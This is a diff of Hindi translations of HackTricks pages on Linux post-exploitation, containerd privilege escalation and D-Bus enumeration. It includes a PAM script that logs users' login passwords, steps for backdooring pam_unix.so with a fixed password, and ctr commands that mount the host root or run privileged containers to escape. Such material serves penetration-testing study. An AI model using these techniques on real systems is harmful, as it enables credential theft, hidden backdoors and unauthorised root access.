* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# लिनक्स पोस्ट-एक्सप्लोइटेशन
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## PAM के साथ लॉगऑन पासवर्ड को स्निफ़ करें
|
||||
## PAM के साथ लॉगऑन पासवर्ड को स्निफ करें
|
||||
|
||||
आइए एक PAM मॉड्यूल कॉन्फ़िगर करें ताकि हर उपयोगकर्ता जो लॉगिन करता है, उसका पासवर्ड लॉग कर सकें। अगर आपको PAM क्या है इसका पता नहीं है तो देखें:
|
||||
चलिए एक PAM मॉड्यूल कॉन्फ़िगर करें ताकि हर उपयोगकर्ता जो लॉगिन करने के लिए उपयोग करता है, उस पासवर्ड को लॉग कर सकें। अगर आपको PAM क्या है इसका पता नहीं है तो देखें:
|
||||
|
||||
{% content-ref url="pam-pluggable-authentication-modules.md" %}
|
||||
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
|
||||
|
@ -25,12 +26,12 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
**अधिक विवरण के लिए [मूल पोस्ट](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/) देखें**। यह सिर्फ एक सारांश है:
|
||||
|
||||
**तकनीक अवलोकन:**
|
||||
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) यूनिक्स-आधारित सिस्टमों पर प्रमाणीकरण को प्रबंधित करने में लचीलाई प्रदान करते हैं। वे लॉगिन प्रक्रियाओं को अनुकूलित करके सुरक्षा को बढ़ा सकते हैं लेकिन गलत तरीके से उपयोग किए जाने पर खतरे भी उठा सकते हैं। यह सारांश एक तकनीक को आउटलाइन करता है जिससे PAM का उपयोग करके लॉगिन क्रेडेंशियल्स को कैप्चर किया जा सकता है, साथ ही संशोधन रणनीतियों।
|
||||
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) यूनिक्स-आधारित सिस्टम पर प्रमाणीकरण को प्रबंधित करने में लचीलाई प्रदान करते हैं। वे लॉगिन प्रक्रियाओं को अनुकूलित करके सुरक्षा को बढ़ा सकते हैं लेकिन गलत तरीके से उपयोग किए जाने पर खतरे भी उठा सकते हैं। यह सारांश एक तकनीक को उजागर करने के लिए PAM का उपयोग करके लॉगिन क्रेडेंशियल को कैप्चर करने की विधि को रूपांतरित करता है, साथ ही संशोधन रणनीतियों को।
|
||||
|
||||
**क्रेडेंशियल्स को कैप्चर करना:**
|
||||
- `toomanysecrets.sh` नामक एक बैश स्क्रिप्ट तैयार किया जाता है ताकि लॉगिन प्रयासों को लॉग किया जा सके, जिसमें तारीख, उपयोगकर्ता नाम (`$PAM_USER`), पासवर्ड (stdin के माध्यम से), और रिमोट होस्ट IP (`$PAM_RHOST`) को `/var/log/toomanysecrets.log` में कैप्चर किया जाता है।
|
||||
- स्क्रिप्ट को क्रियाशील बनाया जाता है और `pam_exec.so` मॉड्यूल का उपयोग करके PAM कॉन्फ़िगरेशन (`common-auth`) में शामिल किया जाता है, जिसमें स्क्रिप्ट को चुपचाप चलाने और प्रमाणीकरण टोकन को स्क्रिप्ट को उजागर करने के विकल्प शामिल हैं।
|
||||
- यह दिखाता है कि कैसे एक कंप्रोमाइज़्ड लिनक्स होस्ट को गुप्त रूप से क्रेडेंशियल्स लॉग करने के लिए उपयोग किया जा सकता है।
|
||||
**क्रेडेंशियल को कैप्चर करना:**
|
||||
- `toomanysecrets.sh` नामक एक बैश स्क्रिप्ट तैयार किया गया है जो लॉगिन प्रयासों को लॉग करने के लिए बनाया गया है, जिसमें तारीख, उपयोगकर्ता नाम (`$PAM_USER`), पासवर्ड (stdin के माध्यम से), और रिमोट होस्ट IP (`$PAM_RHOST`) को `/var/log/toomanysecrets.log` में कैप्चर किया जाता है।
|
||||
- स्क्रिप्ट को क्रियाशील बनाया जाता है और `pam_exec.so` मॉड्यूल का उपयोग करके PAM कॉन्फ़िगरेशन (`common-auth`) में शामिल किया जाता है, जिसमें स्क्रिप्ट को चुपचाप चलाने और प्रमाणीकरण टोकन को स्क्रिप्ट को उजागर करने के विकल्प दिए जाते हैं।
|
||||
- यह दृष्टिकोण दिखाता है कि कैसे एक कंप्रोमाइज़्ड लिनक्स होस्ट को गुप्त रूप से क्रेडेंशियल को लॉग करने के लिए उपयोग किया जा सकता है।
|
||||
```bash
|
||||
#!/bin/sh
|
||||
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
|
||||
|
@ -44,16 +45,20 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
|
|||
|
||||
**अधिक विवरण के लिए [मूल पोस्ट](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9) देखें**। यह केवल एक सारांश है:
|
||||
|
||||
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) एक सिस्टम है जो लिनक्स के तहत उपयोगकर्ता प्रमाणीकरण के लिए उपयोग किया जाता है। यह तीन मुख्य अवधारणाओं पर काम करता है: **उपयोगकर्ता नाम**, **पासवर्ड**, और **सेवा**। प्रत्येक सेवा के लिए कॉन्फ़िगरेशन फ़ाइलें `/etc/pam.d/` निर्देशिका में स्थित हैं, जहां साझा पुस्तकालय प्रमाणीकरण का संचालन करती है।
|
||||
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) एक सिस्टम है जो लिनक्स के तहत उपयोगकर्ता प्रमाणीकरण के लिए उपयोग किया जाता है। यह तीन मुख्य अवधारणाओं पर काम करता है: **उपयोगकर्ता नाम**, **पासवर्ड**, और **सेवा**। प्रत्येक सेवा के लिए कॉन्फ़िगरेशन फ़ाइलें `/etc/pam.d/` निर्देशिका में स्थित हैं, जहां साझा लाइब्रेरी प्रमाणीकरण का संचालन करती है।
|
||||
|
||||
**उद्देश्य**: PAM को संशोधित करें ताकि एक विशिष्ट पासवर्ड के साथ प्रमाणीकरण संभव हो, वास्तविक उपयोगकर्ता पासवर्ड को छोड़कर। यह विशेष रूप से `common-auth` फ़ाइल द्वारा उपयोग किए जाने वाले `pam_unix.so` साझा पुस्तकालय पर ध्यान केंद्रित है, जो पासवर्ड सत्यापन के लिए लगभग सभी सेवाओं द्वारा समाविष्ट किया जाता है।
|
||||
**उद्देश्य**: PAM को संशोधित करें ताकि एक विशिष्ट पासवर्ड के साथ प्रमाणीकरण संभव हो, वास्तविक उपयोगकर्ता पासवर्ड को छोड़कर। यह विशेष रूप से `common-auth` फ़ाइल द्वारा उपयोग की जाने वाली `pam_unix.so` साझा लाइब्रेरी पर ध्यान केंद्रित है, जो पासवर्ड सत्यापन के लिए लगभग सभी सेवाओं द्वारा समाहित किया जाता है।
|
||||
|
||||
### `pam_unix.so` को संशोधित करने के लिए चरण:
|
||||
|
||||
1. **`common-auth` फ़ाइल में प्रमाणीकरण निर्देशिका का पता लगाएं**:
|
||||
- उपयोगकर्ता के पासवर्ड की जांच के लिए जिम्मेदार लाइन `pam_unix.so` को बुलाती है।
|
||||
2. **स्रोत को संशोधित करें**:
|
||||
- `pam_unix_auth.c` स्रोत फ़ाइल में एक शर्तमय वक्तव्य जोड़ें जो यदि एक पूर्वनिर्धारित पासवर्ड का उपयोग किया जाता है, तो पहुँच देता है, अन्यथा, यह सामान्य प्रमाणीकरण प्रक्रिया के साथ आगे बढ़ता है।
|
||||
3. **पुनः कॉम्पाइल और पुनः रखें** संशोधित `pam_unix.so` पुस्तकालय को उचित निर्देशिका में।
|
||||
- `pam_unix_auth.c` स्रोत फ़ाइल में एक शर्तमय वक्तव्य जोड़ें जो यदि एक पूर्वनिर्धारित पासवर्ड का उपयोग किया जाता है, तो पहुंच देता है, अन्यथा, यह सामान्य प्रमाणीकरण प्रक्रिया के साथ आगे बढ़ता है।
|
||||
3. **पुनः कंपाइल और पुनः रखें** संशोधित `pam_unix.so` लाइब्रेरी को उचित निर्देशिका में।
|
||||
4. **परीक्षण**:
|
||||
- पूर्वनिर्धारित पासवर्ड के साथ विभिन्न सेवाओं (लॉगिन, ssh, sudo, su, स्क्रीनसेवर) में पहुँच प्रदान की जाती है, जबकि सामान्य प्रमाणीकरण प्रक्रियाएँ प्रभावित नहीं होती हैं।
|
||||
- पूर्वनिर्धारित पासवर्ड के साथ विभिन्न सेवाओं (लॉगिन, ssh, sudo, su, स्क्रीनसेवर) में पहुंच प्रदान की जाती है, जबकि सामान्य प्रमाणीकरण प्रक्रियाएँ प्रभावित नहीं होती हैं।
|
||||
|
||||
{% hint style="info" %}
|
||||
आप इस प्रक्रिया को [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) के साथ स्वचालित कर सकते हैं।
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# कंटेनरडी (ctr) प्रिविलेज एस्कलेशन
|
||||
# Containerd (ctr) वर्दी उन्नति
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## मूल जानकारी
|
||||
## मौलिक जानकारी
|
||||
|
||||
**कंटेनरडी** और `ctr` क्या है इसे जानने के लिए निम्न लिंक पर जाएं:
|
||||
**कंटेनर्ड** और `ctr` क्या है इसे सीखने के लिए निम्न लिंक पर जाएं:
|
||||
|
||||
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
|
||||
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
|
||||
|
@ -29,26 +30,41 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
which ctr
|
||||
/usr/bin/ctr
|
||||
```
|
||||
आप छवियों की सूची बना सकते हैं:
|
||||
तुम छवियों की सूची बना सकते हो:
|
||||
```bash
|
||||
ctr image list
|
||||
REF TYPE DIGEST SIZE PLATFORMS LABELS
|
||||
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
|
||||
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
|
||||
```
|
||||
और फिर **उन छवियों में से एक को चलाएं जिसमें मेज़बान रूट फ़ोल्डर को माउंट करें**:
|
||||
और फिर **उन छवियों में से एक को चलाएं जिसमें मेज़बान रूट फ़ोल्डर को माउंट किया गया है**:
|
||||
```bash
|
||||
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
|
||||
```
|
||||
## PE 2
|
||||
|
||||
एक कंटेनर को विशेषाधिकार सहित चलाएं और उससे बाहर निकलें।\
|
||||
आप इसे विशेषाधिकार सहित एक कंटेनर के रूप में चला सकते हैं:
|
||||
एक कंटेनर को विशेषाधिकार से चलाएं और उससे बाहर निकलें।\
|
||||
आप इसे विशेषाधिकृत कंटेनर के रूप में चला सकते हैं:
|
||||
```bash
|
||||
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
|
||||
```
|
||||
तो आप इससे बाहर निकलने के लिए कुछ तकनीकों का उपयोग कर सकते हैं जो निम्नलिखित पृष्ठ में उल्लेखित किए गए हैं **विशेषाधिकारित क्षमताओं का दुरुपयोग करना**:
|
||||
तो आप इससे बाहर निकलने के लिए कुछ तकनीकों का उपयोग कर सकते हैं जो निम्नलिखित पृष्ठ में उल्लेखित हैं **विशेषाधिकारित क्षमताओं का दुरुपयोग करके**:
|
||||
|
||||
{% content-ref url="docker-security/" %}
|
||||
[docker-security](docker-security/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,35 +1,50 @@
|
|||
# D-Bus Enumeration & Command Injection Privilege Escalation
|
||||
# D-Bus एनुमरेशन और कमांड इंजेक्शन प्रिविलेज एस्केलेशन
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## **GUI एनुमरेशन**
|
||||
|
||||
D-Bus को Ubuntu डेस्कटॉप वातावरणों में अंतर-प्रक्रिया संचार (IPC) माध्यम के रूप में उपयोग किया जाता है। Ubuntu पर, कई संदेश बसों का समकालिक कार्यान्वयन देखा जाता है: सिस्टम बस, जो मुख्य रूप से **विशेषाधिकारी सेवाओं द्वारा सिस्टम भर में महत्वपूर्ण सेवाएं उजागर करने के लिए** उपयोग किया जाता है, और प्रत्येक लॉग-इन उपयोगकर्ता के लिए एक सत्र बस, जो केवल उस विशेष उपयोगकर्ता के लिए महत्वपूर्ण सेवाएं उजागर करता है। यहाँ मुख्य रूप से सिस्टम बस पर ध्यान केंद्रित है क्योंकि इसका संबंध उच्च विशेषाधिकारों (जैसे कि रूट) पर चल रही सेवाओं से है जैसे कि हमारा उद्देश्य प्रिविलेज उन्नत करना है। यह ध्यान दिया जाता है कि D-Bus की संरचना एक 'राउटर' प्रति सत्र बस का उपयोग करती है, जो ग्राहक संदेशों को सही सेवाओं के द्वारा पुनर्निर्देशित करने के लिए जिम्मेदार है जो ग्राहकों द्वारा उन सेवाओं के साथ संवाद करना चाहते हैं उनके द्वारा निर्दिष्ट पते के आधार पर।
|
||||
D-Bus को यूबंटू डेस्कटॉप वातावरण में इंटर-प्रोसेस संचार (IPC) मीडिएटर के रूप में उपयोग किया जाता है। यूबंटू पर, कई संदेश बसों का समकालिक ऑपरेशन देखा जाता है: सिस्टम बस, जो मुख्य रूप से **विशेषाधिकारी सेवाओं द्वारा सिस्टम के लिए महत्वपूर्ण सेवाएं उजागर करने के लिए** उपयोग किया जाता है, और प्रत्येक लॉग-इन उपयोगकर्ता के लिए एक सत्र बस, जो केवल उस विशेष उपयोगकर्ता के लिए महत्वपूर्ण सेवाएं उजागर करता है। यहाँ मुख्य रूप से सिस्टम बस पर ध्यान केंद्रित है क्योंकि इसका संबंध उच्च विशेषाधिकारों (जैसे कि रूट) पर चल रही सेवाओं से है जैसे कि हमारा उद्देश्य विशेषाधिकारों को उच्च करना है। यह ध्यान दिया जाता है कि D-Bus की वास्तुकला एक 'राउटर' प्रति सत्र बस का उपयोग करती है, जो ग्राहक संदेशों को उचित सेवाओं के द्वारा पुनर्निर्देशित करने के लिए जिम्मेदार है जो ग्राहकों द्वारा उन सेवाओं के साथ संवाद करना चाहते हैं, उनके द्वारा निर्दिष्ट पते पर आधारित।
|
||||
|
||||
D-Bus पर सेवाएं **ऑब्जेक्ट्स** और **इंटरफेसेस** द्वारा परिभाषित की जाती हैं। ऑब्ज
|
||||
D-Bus पर सेवाएं **ऑब्जेक्ट्स** और **इंटरफेसेस** द्वारा परिभाषित होती हैं। ऑब्जेक्ट्स को मानक OOP भाषाओं में क्लास इंस्टेंस के रूप में तुलना की जा सकती है, प्रत्येक इंस्टेंस को एक **ऑब्जेक्ट पथ** द्वारा अद्वितीय रूप से पहचाना जाता है। यह पथ, एक फाइल सिस्टम पथ की तरह, प्रत्येक सेवा द्वारा उजागर किए गए प्रत्येक ऑब्जेक्ट को अद्वितीय रूप से पहचानता है। अनुसंधान के उद्देश्य के लिए एक मुख्य इंटरफेस **org.freedesktop.DBus.Introspectable** इंटरफेस है, जिसमें एक एकल मेथड, इंट्रोस्पेक्ट है। यह मेथड ऑब्जेक्ट के समर्थित मेथडों, सिग्नल्स, और गुणों का एक XML प्रतिनिधित्व वापस करता है, जिसमें यहाँ मुख्य रूप से मेथड पर ध्यान केंद्रित है जबकि गुणों और सिग्नल्स को छोड़ दिया गया है।
|
||||
|
||||
D-Bus इंटरफेस के साथ संचार के लिए, दो उपकरणों का उपयोग किया गया: एक CLI उपकरण जिसका नाम है **gdbus** जो D-Bus द्वारा उजागर किए गए मेथड्स को स्क्रिप्ट में आसानता से आमंत्रित करने के लिए है, और [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), एक Python आधारित GUI उपकरण जो प्रत्येक बस पर उपलब्ध सेवाओं को एनुमरेट करने के लिए डिज़ाइन किया गया है और प्रत्येक सेवा में शामिल ऑब्जेक्ट्स को प्रदर्शित करने के लिए।
|
||||
```bash
|
||||
sudo apt-get install d-feet
|
||||
```
|
||||
|
||||
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png)
|
||||
|
||||
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
|
||||
|
||||
पहली छवि में D-Bus सिस्टम बस के साथ पंजीकृत सेवाएं दिखाई गई हैं, **org.debin.apt** को विशेष रूप से चुनकर सिस्टम बस बटन को चुनने के बाद। D-Feet इस सेवा के लिए ऑब्जेक्ट्स के लिए क्वेरी करता है, चुने गए ऑब्ज
|
||||
|
||||
पहली छवि में D-Bus सिस्टम बस के साथ पंजीकृत सेवाएं दिखाई गई हैं, **org.debin.apt** को विशेष रूप से चुनकर सिस्टम बस बटन को चुनने के बाद। D-Feet इस सेवा के लिए ऑब्जेक्ट क्वेरी करता है, चुने गए ऑब्जेक्ट्स के लिए इंटरफेस, मेथड्स, गुण, और सिग्नल्स प्रदर्शित करता है, जो दूसरी छवि में दिखाई देता है। प्रत्येक मेथड का सिग्नेचर भी विस्तार से दिखाया गया है।
|
||||
|
||||
एक महत्वपूर्ण विशेषता यह है कि सेवा के **प्रोसेस आईडी (पीआईडी)** और **कमांड लाइन** का प्रदर्शन होता है, जो उच्च विशेषाधिकारों के साथ सेवा चलती है या नहीं की पुष्टि के लिए उपयोगी है, जो अनुसंधान के महत्व के लिए महत्वपूर्ण है।
|
||||
|
||||
**D-Feet भी मेथड आवाहन की अनुमति देता है**: उपयोगकर्ता पायथन व्यक्तियों को पैरामीटर के रूप में इनपुट कर सकते हैं, जिन्हें D-Feet सेवा को पास करने से पहले D-Bus प्रकार में रूपांतरित करता है।
|
||||
|
||||
हालांकि, ध्यान दें कि **कुछ मेथड्स को आवाहन करने से पहले प्रमाणीकरण की आवश्यकता** होती है। हम इन मेथड्स को नजरअंदाज करेंगे, क्योंकि हमारा लक्ष्य पहले ही क्रेडेंशियल के बिना हमारी विशेषाधिकारों को उन्नत करना है।
|
||||
|
||||
यह भी ध्यान दें कि कुछ सेवाएं किसी अन्य D-Bus सेवा को क्वेरी करती हैं जिसका नाम org.freedeskto.PolicyKit1 है कि क्या एक उपयोगकर्ता को कुछ कार्रवाई करने की अनुमति होनी चाहिए या नहीं।
|
||||
|
||||
## **Cmd line गणना**
|
||||
|
||||
### सेवा ऑब्जेक्ट्स की सूची
|
||||
|
||||
खुली हुई D-Bus इंटरफेस की सूची बनाना संभव है:
|
||||
```bash
|
||||
busctl list #List D-Bus interfaces
|
||||
|
||||
|
@ -53,13 +68,13 @@ org.freedesktop.PolicyKit1 - - - (act
|
|||
org.freedesktop.hostname1 - - - (activatable) - -
|
||||
org.freedesktop.locale1 - - - (activatable) - -
|
||||
```
|
||||
|
||||
#### कनेक्शन
|
||||
|
||||
[विकिपीडिया से:](https://en.wikipedia.org/wiki/D-Bus) जब कोई प्रक्रिया एक बस के साथ एक कनेक्शन सेट करती है, तो बस कनेक्शन को एक विशेष बस नाम जो _अद्वितीय कनेक्शन नाम_ कहलाता है निर्धारित करता है। इस प्रकार के बस नाम अपरिवर्तनीय होते हैं—यह गारंटी है कि जब तक कनेक्शन मौजूद है, तब तक ये नहीं बदलेंगे—और, और भी महत्वपूर्ण है, इन्हें बस के जीवनकाल में पुनः उपयोग नहीं किया जा सकता। इसका मतलब है कि उस बस के लिए कोई भी अन्य कनेक्शन कभी भी ऐसा अद्वितीय कनेक्शन नाम नहीं होगा, भले ही वही प्रक्रिया उस बस के साथ कनेक्शन बंद कर देती है और एक नया बनाती है। अद्वितीय कनेक्शन नाम आसानी से पहचाने जा सकते हैं क्योंकि वे—अन्यथा निषिद्ध—अक्षर कोलन के साथ शुरू होते हैं।
|
||||
